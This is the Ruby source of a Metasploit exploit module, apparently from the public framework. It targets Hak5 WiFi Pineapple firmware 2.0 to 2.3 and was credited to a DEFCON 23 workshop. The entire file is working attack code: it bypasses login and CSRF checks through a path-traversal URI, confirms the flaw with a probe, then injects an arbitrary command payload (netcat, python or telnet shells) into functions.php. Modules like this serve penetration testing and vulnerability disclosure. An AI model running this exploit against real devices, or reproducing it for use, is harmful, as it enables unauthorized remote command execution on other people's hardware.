## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection', 'Description' => %q{ This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4. These devices may typically be identified by their SSID beacons of 'Pineapple5_....'; Provided as part of the TospoVirus workshop at DEFCON23. }, 'Author' => ['catatonicprime'], 'License' => MSF_LICENSE, 'References' => [ ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 2048, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic python netcat telnet' } }, 'Targets' => [ [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 1 2015')) register_options( [ OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]), Opt::RPORT(1471), Opt::RHOST('172.16.42.1') ] ) deregister_options( 'ContextInformationFile', 'DOMAIN', 'DigestAuthIIS', 'EnableContextEncoding', 'FingerprintCheck', 'HttpClientTimeout', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'SSL', 'SSLVersion', 'VERBOSE', 'WORKSPACE', 'WfsDelay', 'Proxies', 'VHOST' ) end def cmd_uri normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path) end def cmd_inject(cmd) res = send_request_cgi( 'method' => 'POST', 'uri' => cmd_uri, 'vars_get' => { 'execute' => "" # Presence triggers command execution }, 'vars_post' => { 'commands' => cmd }) res end def check res = cmd_inject("echo") if res && res.code == 200 && res.body =~ /Executing/ return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def exploit print_status('Attempting to bypass login/csrf checks...') unless check fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...') end print_status('Executing payload...') cmd_inject("#{payload.encoded}") end end